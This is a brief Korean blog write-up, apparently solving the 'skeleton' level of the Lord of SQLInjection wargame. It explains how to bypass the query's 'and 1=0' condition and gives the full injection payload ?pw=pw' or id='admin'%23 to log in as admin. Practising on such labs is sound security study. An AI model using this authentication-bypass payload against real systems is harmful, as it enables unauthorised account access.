워게임 문제풀이/Lord of SQLInjection
skeleton
mi,,
2022. 9. 5. 01:13

if($result['id'] == 'admin') solve("skeleton");
id가 admin이 맞다면 문제는 풀린다.
pw 값에 아무 문자나 입력한 뒤, or id=admin을 입력하고 and 1=0을 주석 처리한다.

정답: ?pw=pw’ or id=’admin’%23